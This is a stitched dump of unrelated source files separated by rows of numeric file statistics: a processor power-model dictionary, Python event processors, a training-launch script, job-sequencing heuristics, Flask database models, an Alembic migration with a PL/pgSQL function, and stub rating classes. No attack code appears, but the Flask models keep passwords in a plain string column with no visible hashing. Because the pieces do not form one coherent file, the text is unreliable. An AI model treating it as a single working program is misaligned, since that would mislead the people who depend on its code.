'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 64.2906,
'Peak Power': 97.4029,
'Runtime Dynamic': 10.8956,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 64.0002,
'Total Cores/Runtime Dynamic': 10.7922,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.290465,
'Total L3s/Runtime Dynamic': 0.103356,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.110503
| 124
| 0.68219
| 8,088
| 68,651
| 5.784496
| 0.067631
| 0.123458
| 0.112857
| 0.093363
| 0.938784
| 0.930918
| 0.918542
| 0.887785
| 0.862777
| 0.842108
| 0
| 0.132407
| 0.224192
| 68,651
| 914
| 125
| 75.110503
| 0.74602
| 0
| 0
| 0.642232
| 0
| 0
| 0.657009
| 0.048069
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
985a5c8b8ba0d5db2851ae3ff2d0a5e82e87720a
| 218
|
py
|
Python
|
infrabbitmq/events_processors.py
|
aleasoluciones/infrabbitmq3
|
5a5f5cf7e4fbcdae659855edcbf1b8c2d007f69f
|
[
"MIT"
] | null | null | null |
infrabbitmq/events_processors.py
|
aleasoluciones/infrabbitmq3
|
5a5f5cf7e4fbcdae659855edcbf1b8c2d007f69f
|
[
"MIT"
] | null | null | null |
infrabbitmq/events_processors.py
|
aleasoluciones/infrabbitmq3
|
5a5f5cf7e4fbcdae659855edcbf1b8c2d007f69f
|
[
"MIT"
] | 1
|
2019-04-15T06:38:30.000Z
|
2019-04-15T06:38:30.000Z
|
class NoopProcessor:
    """Event processor that deliberately ignores every event it receives."""

    def process(self, event):
        """Discard *event*; always returns None."""
        return None
class ConsoleLogEventsProcessor:
    """Event processor that writes a one-line summary of each event to stdout."""

    def process(self, event):
        """Print timestamp, network, name, id and data of *event*, space-separated."""
        fields = (event.timestamp, event.network, event.name, event.id, event.data)
        print(' '.join(str(field) for field in fields))
| 24.222222
| 88
| 0.674312
| 25
| 218
| 5.88
| 0.6
| 0.136054
| 0.190476
| 0.258503
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192661
| 218
| 8
| 89
| 27.25
| 0.835227
| 0
| 0
| 0.333333
| 0
| 0.166667
| 0.321101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0
| 0
| 0.666667
| 0.166667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
987d184c08d3d081f6a0f131040bc0f6cde9af2c
| 287
|
py
|
Python
|
platform/hwconf_data/mgm12/modules/WTIMER1/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | null | null | null |
platform/hwconf_data/mgm12/modules/WTIMER1/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T02:36:22.000Z
|
2020-08-25T02:36:22.000Z
|
platform/hwconf_data/mgm12/modules/WTIMER1/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T01:56:04.000Z
|
2020-08-25T01:56:04.000Z
|
import mgm12.halconfig.halconfig_types as halconfig_types
import mgm12.halconfig.halconfig_dependency as halconfig_dependency
import mgm12.PythonSnippet.ExporterModel as ExporterModel
import mgm12.PythonSnippet.RuntimeModel as RuntimeModel
import mgm12.PythonSnippet.Metadata as Metadata
| 57.4
| 67
| 0.898955
| 34
| 287
| 7.470588
| 0.294118
| 0.216535
| 0.283465
| 0.228346
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037313
| 0.066202
| 287
| 5
| 68
| 57.4
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7f63e14347c4733d5946190bb96be04956f29451
| 14
|
py
|
Python
|
1_Datentypen/03_tuples/_02_short_swap_tricks.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_02_short_swap_tricks.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_02_short_swap_tricks.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
# Two plain integers for the tuple-swap demonstration.
x, y = 7, 11
| 3.5
| 6
| 0.357143
| 4
| 14
| 1.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 0.5
| 14
| 3
| 7
| 4.666667
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f8f9a40898f73a30a1fe420409f50885da5f3c5
| 540
|
py
|
Python
|
train_medseg_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_medseg_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_medseg_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os

# One training command per cross-validation fold (0-4); only the fold index
# differed between the original five hard-coded command strings.
ls = [
    "python main.py --configs "
    f"configs/train_medseg_unetplusplus_timm-regnetx_002_fold{fold}_posterize.yml"
    for fold in range(5)
]


def main():
    """Run the five fold-training commands sequentially via the shell."""
    for command in ls:
        os.system(command)


# Guard the side effects so importing this module no longer launches trainings.
if __name__ == "__main__":
    main()
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f689a957217b635de2d19c5dbdf35e3d663f3620
| 43
|
py
|
Python
|
hcap_utils/contrib/decorators/__init__.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | null | null | null |
hcap_utils/contrib/decorators/__init__.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | 31
|
2020-04-11T13:38:17.000Z
|
2021-09-22T18:51:11.000Z
|
hcap_utils/contrib/decorators/__init__.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | 1
|
2020-04-12T17:51:20.000Z
|
2020-04-12T17:51:20.000Z
|
from .model_property import model_property
| 21.5
| 42
| 0.883721
| 6
| 43
| 6
| 0.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 1
| 43
| 43
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1004327714c791643ad32bc3b65931d216210cb3
| 8,083
|
py
|
Python
|
lib/toolbox/sequencing_functions.py
|
S1ang0/NEAT_THFS
|
774b4f9f689855eebf5d5c8ca1b8aafe7bbfcea6
|
[
"MIT"
] | 1
|
2021-02-17T08:57:48.000Z
|
2021-02-17T08:57:48.000Z
|
lib/toolbox/sequencing_functions.py
|
S1ang0/NEAT_THFS
|
774b4f9f689855eebf5d5c8ca1b8aafe7bbfcea6
|
[
"MIT"
] | null | null | null |
lib/toolbox/sequencing_functions.py
|
S1ang0/NEAT_THFS
|
774b4f9f689855eebf5d5c8ca1b8aafe7bbfcea6
|
[
"MIT"
] | 1
|
2021-02-21T20:56:01.000Z
|
2021-02-21T20:56:01.000Z
|
def pre_sequencing_4_input_neurons(dataset, ann, *args, **kwargs):
    """
    Generates an initial job sequence based on the priorization of
    an artificial neural network. The job sequence will be feed to the model.

    Each job's ANN output is stored under key 9 and used as its priority;
    jobs are ordered by descending priority.

    Input features:
    ---------------
    * job's due date
    * job's family
    * job's t_smd
    * job's t_aoi
    """
    for job in dataset.values():
        features = [
            job["scaled due date"],
            job["scaled family"],
            job["scaled t_smd"],
            job["scaled t_aoi"],
        ]
        # Forward propagation; the output is the job's priority.
        job[9] = ann.activate(features)
    # Python's sort is stable, so equal priorities keep dataset (insertion)
    # order -- exactly what the original O(n^2) insertion loop produced,
    # but in O(n log n).
    return sorted(dataset.values(), key=lambda job: job[9], reverse=True)
def post_sequencing_5_input_neurons(self, job, smd, *args, **kwargs):
    """
    Inserts job in the buffer of the selected SMD according to the
    priorization of an artificial neural network.

    Input features:
    ---------------
    * job's due date
    * job's family
    * job's t_smd
    * job's t_aoi
    * setup type of allocated SMD
    """
    # 1. Create feature vector for ANN
    features = [
        job.duedate_scaled,
        job.family_scaled,
        job.t_smd_scaled,
        job.t_aoi_scaled,
        smd.setuptype_scaled,
    ]
    # 2. Forward propagation
    job.priority = self.post_sequencing_ann.activate(features)
    # 3. Insert before the first queued job with strictly lower priority;
    # otherwise (including an empty buffer) append at the end.  The for/else
    # replaces the original `sequencing_successful == False` flag dance.
    queue = smd.buffer
    for index, queued_job in enumerate(queue):
        if job.priority > queued_job.priority:
            queue.insert(index, job)
            break
    else:
        queue.append(job)
def fifo_pre_sequencing(dataset, *args, **kwargs):
    """
    Generates an initial job sequence based on the first-in-first-out
    dispatching strategy. The job sequence will be feed to the model.
    """
    # FIFO keeps the jobs exactly in dataset (insertion) order.
    return list(dataset.values())
def fifo_post_sequencing(self, job, smd, *args, **kwargs):
    """
    Inserts job in the buffer of the selected SMD according to the
    first-in-first-out dispatching strategy
    """
    # FIFO: the newest job always goes to the back of the SMD's buffer.
    smd.buffer.append(job)
def lifo_pre_sequencing(dataset, *args, **kwargs):
    """
    Generates an initial job sequence based on the last-in-first-out
    dispatching strategy. The job sequence will be feed to the model.
    """
    # The original grew the list with insert(0, ...) per job (O(n^2));
    # reversing the insertion-ordered values once is O(n) and identical.
    return list(dataset.values())[::-1]
def lifo_post_sequencing(self, job, smd, *args, **kwargs):
    """
    Inserts job in the buffer of the selected SMD according to the
    last-in-first-out dispatching strategy
    """
    # LIFO: the newest job jumps to the front of the SMD's buffer.
    smd.buffer.insert(0, job)
def edd_pre_sequencing(dataset, *args, **kwargs):
    """
    Generates an initial job sequence based on the earliest-due-date
    dispatching strategy. The job sequence will be feed to the model.
    """
    # A stable ascending sort by due date reproduces the original O(n^2)
    # insertion loop exactly: equal due dates keep dataset order.
    return sorted(dataset.values(), key=lambda job: job["due date"])
def edd_post_sequencing(self, job, smd, *args, **kwargs):
    """
    Inserts job in the buffer of the selected SMD according to the
    earliest-due-date dispatching strategy
    """
    # Insert before the first queued job with a strictly later due date;
    # otherwise (including an empty buffer) append at the end.  Replaces
    # the original `sequencing_successful == False` flag pattern.
    queue = smd.buffer
    for index, queued_job in enumerate(queue):
        if job.duedate < queued_job.duedate:
            queue.insert(index, job)
            break
    else:
        queue.append(job)
def spt_pre_sequencing(dataset, *args, **kwargs):
    """
    Generates an initial job sequence based on the shortest-processing-time
    dispatching strategy. The job sequence will be feed to the model.
    """
    # A stable ascending sort by total processing time (t_smd + t_aoi)
    # reproduces the original O(n^2) insertion loop: ties keep dataset order.
    return sorted(dataset.values(), key=lambda job: job["t_smd"] + job["t_aoi"])
def spt_post_sequencing(self, job, smd, *args, **kwargs):
    """
    Inserts job in the buffer of the selected SMD according to the
    shortest-processing-time dispatching strategy
    """
    # Insert before the first queued job with a strictly longer total
    # processing time; otherwise append.  Replaces the original
    # `sequencing_successful == False` flag pattern.
    job_time = job.t_smd + job.t_aoi
    queue = smd.buffer
    for index, queued_job in enumerate(queue):
        if job_time < (queued_job.t_smd + queued_job.t_aoi):
            queue.insert(index, job)
            break
    else:
        queue.append(job)
def edd_x_spt_pre_sequencing(dataset, w_edd=0.5, w_spt=0.5, *args, **kwargs):
    """
    Generates an initial job sequence based on a weighted combination of
    the earliest-due-date and the shortest-processing-time
    dispatching strategy. The job sequence will be feed to the model.

    Each job gets a dense rank under EDD (rank 1 = earliest due date; equal
    due dates share a rank) and a dense rank under SPT (rank 1 = shortest
    t_smd + t_aoi).  The weighted sum w_edd * edd_rank + w_spt * spt_rank is
    stored in job["rank"] and used as the final sort key.
    """
    sequence = [job for job in dataset.values()]

    # sort and rank according to edd
    sequence = sorted(sequence, key=lambda job: job["due date"])
    rank = 1
    prev_job = None
    for job in sequence:
        # Dense ranking: the rank advances only when the due date changes.
        if prev_job and job["due date"] != prev_job["due date"]:
            rank += 1
        job["rank"] = rank
        prev_job = job

    # sort and rank according to spt and create joint edd_spt_rank
    sequence = sorted(sequence, key=lambda job: job["t_smd"] + job["t_aoi"])
    rank = 1
    prev_job = None
    for job in sequence:
        if (
            prev_job
            and job["t_smd"] + job["t_aoi"] != prev_job["t_smd"] + prev_job["t_aoi"]
        ):
            rank += 1
        # job["rank"] still holds the EDD rank here; replace it with the
        # weighted combination of both ranks.
        job["rank"] = w_edd * job["rank"] + w_spt * rank
        # BUGFIX: the original never updated prev_job in this loop, so the
        # SPT rank stayed stuck at 1 for every job.
        prev_job = job

    # sort according to joint edd_spt_rank
    return sorted(sequence, key=lambda job: job["rank"])
def edd_x_spt_post_sequencing(self, job, smd, w_edd=0.5, w_spt=0.5):
    """
    Inserts job in the buffer of the selected SMD according to a weighted
    combination of the earliest-due-date and the shortest-processing-time
    dispatching strategy. The job sequence will be feed to the model.
    """
    # Weighted EDD x SPT score: lower means more urgent.
    def _score(j):
        return (w_edd * j.duedate) + (w_spt * (j.t_smd + j.t_aoi))

    # Insert before the first queued job with a strictly higher score;
    # otherwise append.  Hoisting job's score avoids recomputing it per
    # comparison, and for/else replaces the `== False` flag pattern.
    job_score = _score(job)
    queue = smd.buffer
    for index, queued_job in enumerate(queue):
        if job_score < _score(queued_job):
            queue.insert(index, job)
            break
    else:
        queue.append(job)
| 27.968858
| 84
| 0.592354
| 997
| 8,083
| 4.667001
| 0.104313
| 0.059102
| 0.07522
| 0.027079
| 0.831936
| 0.815173
| 0.78358
| 0.754997
| 0.749839
| 0.712014
| 0
| 0.003962
| 0.313003
| 8,083
| 288
| 85
| 28.065972
| 0.833964
| 0.250031
| 0
| 0.688312
| 1
| 0
| 0.027393
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077922
| false
| 0
| 0
| 0
| 0.116883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63dceb467b09a851349694788be80ca6d1a47223
| 1,301
|
py
|
Python
|
models.py
|
JiminLeeDev/JMBlog
|
a8079aa4533b887bbb1c65cfe75d63232a7f3938
|
[
"MIT"
] | 1
|
2021-12-22T17:56:46.000Z
|
2021-12-22T17:56:46.000Z
|
models.py
|
JiminLeeDev/JMBlog
|
a8079aa4533b887bbb1c65cfe75d63232a7f3938
|
[
"MIT"
] | null | null | null |
models.py
|
JiminLeeDev/JMBlog
|
a8079aa4533b887bbb1c65cfe75d63232a7f3938
|
[
"MIT"
] | null | null | null |
from flask.helpers import flash
from sqlalchemy.orm import backref
from JMBlog import db
class Account(db.Model):
    """User account table; ``id`` is the login identifier."""

    id = db.Column(db.String(20), primary_key=True)
    # NOTE(review): stored as a plain String(20) -- no hashing is visible in
    # this file; confirm the password is hashed before it reaches the DB.
    password = db.Column(db.String(20), nullable=False)
    nickname = db.Column(db.String(20), nullable=False)
    # Optional link to a comment; the FK row is removed when the referenced
    # comment is deleted (ondelete="CASCADE").
    comment_id = db.Column(
        db.Integer, db.ForeignKey("comment.id", ondelete="CASCADE"), nullable=True
    )
    # Optional link to a post; cascades on post deletion.
    post_id = db.Column(
        db.Integer, db.ForeignKey("post.id", ondelete="CASCADE"), nullable=True
    )
class Post(db.Model):
    """Blog post; linked to its author via ``account_id``."""

    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(200), nullable=False)
    content = db.Column(db.Text(), nullable=False)
    # Creation timestamp; no server default visible here, so the caller
    # presumably sets it -- verify at the insertion site.
    create_date = db.Column(db.DateTime(), nullable=False)
    # Author of the post.
    account_id = db.Column(db.Integer, db.ForeignKey("account.id"))
    # Optional link to a comment; cascades on comment deletion.
    comment_id = db.Column(
        db.Integer, db.ForeignKey("comment.id", ondelete="CASCADE"), nullable=True
    )
class Comment(db.Model):
    """Comment attached to a post (``post_id``) and an author (``account_id``)."""

    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(200), nullable=False)
    content = db.Column(db.Text(), nullable=False)
    # Creation timestamp; caller-supplied (no server default visible here).
    create_date = db.Column(db.DateTime(), nullable=False)
    # Author of the comment.
    account_id = db.Column(db.Integer, db.ForeignKey("account.id"))
    # Post this comment belongs to.
    post_id = db.Column(db.Integer, db.ForeignKey("post.id"))
| 35.162162
| 82
| 0.686395
| 185
| 1,301
| 4.767568
| 0.2
| 0.154195
| 0.192744
| 0.122449
| 0.854875
| 0.845805
| 0.782313
| 0.712018
| 0.712018
| 0.712018
| 0
| 0.010989
| 0.160646
| 1,301
| 36
| 83
| 36.138889
| 0.796703
| 0
| 0
| 0.482759
| 0
| 0
| 0.057648
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.034483
| 0.103448
| 0
| 0.793103
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
63eee150cb953b333eeef4cd433bac343d0fa65e
| 4,558
|
py
|
Python
|
app/lib/pushkin/pushkin/database/migrations/versions/70ad8e4607cd_fix_process_user_login.py
|
krzyhook/pushkin-on-docker
|
05d192d0b4c753bcd41aba0a66394ae39dd78fc6
|
[
"MIT"
] | null | null | null |
app/lib/pushkin/pushkin/database/migrations/versions/70ad8e4607cd_fix_process_user_login.py
|
krzyhook/pushkin-on-docker
|
05d192d0b4c753bcd41aba0a66394ae39dd78fc6
|
[
"MIT"
] | null | null | null |
app/lib/pushkin/pushkin/database/migrations/versions/70ad8e4607cd_fix_process_user_login.py
|
krzyhook/pushkin-on-docker
|
05d192d0b4c753bcd41aba0a66394ae39dd78fc6
|
[
"MIT"
] | null | null | null |
"""fix process_user_login
Revision ID: 70ad8e4607cd
Revises: 822b8de2c260
Create Date: 2016-08-02 15:13:08.896451
"""
# revision identifiers, used by Alembic.
revision = '70ad8e4607cd'
down_revision = '822b8de2c260'
# No branch labels or extra migration dependencies for this revision.
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
func_process_user_login_new="""
CREATE OR REPLACE FUNCTION "process_user_login" (
p_login_id int8,
p_language_id int2,
p_platform_id int2,
p_device_token text,
p_application_version int4,
p_max_devices_per_user int2
)
RETURNS "pg_catalog"."void" AS
$body$
BEGIN
WITH
data(login_id, language_id) AS (
VALUES(p_login_id, p_language_id)
),
update_part AS (
UPDATE login
SET language_id = d.language_id
FROM data d
WHERE login.id = d.login_id
RETURNING d.*
)
INSERT INTO login
(id, language_id)
SELECT d.login_id, d.language_id
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id);
WITH
data_tmp(login_id, platform_id, device_token, application_version) AS (
VALUES(p_login_id, p_platform_id, p_device_token, p_application_version)
),
data AS (
SELECT * FROM data_tmp WHERE device_token IS NOT NULL
),
update_part AS (
UPDATE device SET
application_version = d.application_version,
unregistered_ts = NULL
FROM data d
WHERE (device.device_token = d.device_token OR device.device_token_new = d.device_token)
AND device.login_id = d.login_id
AND device.platform_id = d.platform_id
RETURNING d.*
)
INSERT INTO device(login_id, platform_id, device_token, application_version)
SELECT d.login_id, d.platform_id, d.device_token, d.application_version
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id
AND u.platform_id = d.platform_id
AND u.device_token = d.device_token);
WITH
devices_ordered AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY login_id ORDER BY unregistered_ts DESC NULLS FIRST, id DESC) AS device_order
FROM device
WHERE login_id = p_login_id
),
devices_to_delete AS (
SELECT *
FROM devices_ordered
WHERE device_order > p_max_devices_per_user
)
DELETE FROM device
WHERE id IN (SELECT id FROM devices_to_delete);
END;
$body$
LANGUAGE 'plpgsql'
VOLATILE
CALLED ON NULL INPUT
SECURITY INVOKER;
"""
func_process_user_login_old = """
CREATE OR REPLACE FUNCTION "process_user_login" (
p_login_id int8,
p_language_id int2,
p_platform_id int2,
p_device_token text,
p_application_version int4,
p_max_devices_per_user int2
)
RETURNS "pg_catalog"."void" AS
$body$
BEGIN
WITH
data(login_id, language_id) AS (
VALUES(p_login_id, p_language_id)
),
update_part AS (
UPDATE login
SET language_id = d.language_id
FROM data d
WHERE login.id = d.login_id
RETURNING d.*
)
INSERT INTO login
(id, language_id)
SELECT d.login_id, d.language_id
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id);
WITH
data_tmp(login_id, platform_id, device_token, application_version) AS (
VALUES(p_login_id, p_platform_id, p_device_token, p_application_version)
),
data AS (
SELECT * FROM data_tmp WHERE device_token IS NOT NULL
),
update_part AS (
UPDATE device
SET application_version = d.application_version
FROM data d
WHERE device.device_token = d.device_token
AND device.login_id = d.login_id
AND device.platform_id = d.platform_id
RETURNING d.*
)
INSERT INTO device(login_id, platform_id, device_token, application_version)
SELECT d.login_id, d.platform_id, d.device_token, d.application_version
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id
AND u.platform_id = d.platform_id
AND u.device_token = d.device_token);
WITH
devices_ordered AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY login_id ORDER BY unregistered_ts DESC NULLS FIRST, id DESC) AS device_order
FROM device
WHERE login_id = p_login_id
),
devices_to_delete AS (
SELECT *
FROM devices_ordered
WHERE device_order > p_max_devices_per_user
)
DELETE FROM device
WHERE id IN (SELECT id FROM devices_to_delete);
END;
$body$
LANGUAGE 'plpgsql'
VOLATILE
CALLED ON NULL INPUT
SECURITY INVOKER;
"""
def upgrade():
    """Install the fixed process_user_login function, then clear every
    device's unregistered_ts so existing rows match the new semantics."""
    statements = (
        func_process_user_login_new,
        "UPDATE device SET unregistered_ts = NULL;",
    )
    for statement in statements:
        op.execute(statement)
def downgrade():
    # Reinstall the previous version of the function. NOTE(review): the data
    # change made by upgrade() (clearing unregistered_ts) is not reverted here.
    op.execute(func_process_user_login_old)
| 23.989474
| 111
| 0.730145
| 711
| 4,558
| 4.390999
| 0.146273
| 0.089686
| 0.03075
| 0.035874
| 0.891736
| 0.87508
| 0.856502
| 0.856502
| 0.856502
| 0.856502
| 0
| 0.017568
| 0.200746
| 4,558
| 189
| 112
| 24.116402
| 0.839418
| 0.033129
| 0
| 0.833333
| 0
| 0
| 0.919477
| 0.066983
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011905
| false
| 0
| 0.011905
| 0
| 0.02381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
120c0cad825a5c6b87c8608fa70a02d84ff459ea
| 138
|
py
|
Python
|
naturtag/utils/__init__.py
|
JWCook/inat-image-tagger
|
2ba48ec849517b32cee1bfe9527f838a4f22cd94
|
[
"MIT"
] | 1
|
2020-05-10T23:17:07.000Z
|
2020-05-10T23:17:07.000Z
|
naturtag/utils/__init__.py
|
JWCook/inat-image-tagger
|
2ba48ec849517b32cee1bfe9527f838a4f22cd94
|
[
"MIT"
] | 13
|
2020-05-23T14:56:39.000Z
|
2020-05-24T03:35:21.000Z
|
naturtag/utils/__init__.py
|
JWCook/inat-image-tagger
|
2ba48ec849517b32cee1bfe9527f838a4f22cd94
|
[
"MIT"
] | null | null | null |
# flake8: noqa: F401
from naturtag.utils.image_glob import get_valid_image_paths
from naturtag.utils.thumbnails import generate_thumbnail
| 34.5
| 59
| 0.862319
| 20
| 138
| 5.7
| 0.75
| 0.210526
| 0.298246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.086957
| 138
| 3
| 60
| 46
| 0.873016
| 0.130435
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1210679789086016e140acb1ffa21bfaaf704120
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_janna/na_janna_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_janna/na_janna_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_janna/na_janna_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Placeholder rating models: one empty Ratings subclass per champion matchup
# for NA Janna in the top lane. The classes add no behavior of their own;
# presumably the class name itself is the lookup key used elsewhere in the
# project — confirm before consolidating.
class NA_Janna_Top_Aatrox(Ratings):
    pass
class NA_Janna_Top_Ahri(Ratings):
    pass
class NA_Janna_Top_Akali(Ratings):
    pass
class NA_Janna_Top_Alistar(Ratings):
    pass
class NA_Janna_Top_Amumu(Ratings):
    pass
class NA_Janna_Top_Anivia(Ratings):
    pass
